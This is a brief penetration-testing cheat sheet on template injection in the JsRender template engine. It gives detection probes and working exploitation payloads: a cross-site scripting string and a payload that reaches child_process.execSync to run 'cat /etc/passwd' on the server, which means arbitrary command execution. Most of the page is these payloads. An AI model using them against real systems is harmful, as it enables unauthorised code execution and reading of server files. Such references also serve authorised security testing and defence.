icon

JsRender Template Injection

Last modified: 2023-03-26

JsRender is a light-weight but powerful template engine. It is vulnerable to template injection.

Investigation

Try to insert arbitrary code into double curly brackets. If the result of the code is reflected in the page, we can inject malicious code in the template.

{{:2*3}}
{{:"test".toString}}

Exploitation

# XSS
{{:"test".toString.constructor.call({},"alert(1)")}}
# Read local files
{{:"test".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}